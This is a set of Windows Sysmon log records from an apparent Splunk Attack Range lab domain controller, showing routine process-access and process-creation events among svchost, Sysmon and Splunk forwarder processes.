{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3067,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3068,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.777\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-0010D4150500}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.777","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-0010D4150500}","TargetProcessId":"5112","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3069,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.793\r\nProcessGuid: {A837DB8D-0238-5F25-0000-001095160500}\r\nProcessId: 2272\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list httpServerListener: --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-0238-5F25-0000-0010D4150500}\r\nParentProcessId: 5112\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list httpServerListener: --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.793","ProcessGuid":"{A837DB8D-0238-5F25-0000-001095160500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list httpServerListener: --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-0238-5F25-0000-0010D4150500}","ParentProcessId":"5112","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list httpServerListener: --no-log","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3070,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.792\r\nSourceProcessGUID: {A837DB8D-0238-5F25-0000-0010D4150500}\r\nSourceProcessId: 5112\r\nSourceThreadId: 5108\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-001095160500}\r\nTargetProcessId: 2272\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.792","SourceProcessGUID":"{A837DB8D-0238-5F25-0000-0010D4150500}","SourceProcessId":"5112","SourceThreadId":"5108","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-001095160500}","TargetProcessId":"2272","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3071,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.792\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.792","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3072,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.792\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-001095160500}\r\nTargetProcessId: 2272\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.792","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-001095160500}","TargetProcessId":"2272","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3073,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.792\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.792","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3074,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.792\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.792","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3075,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.792\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.792","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
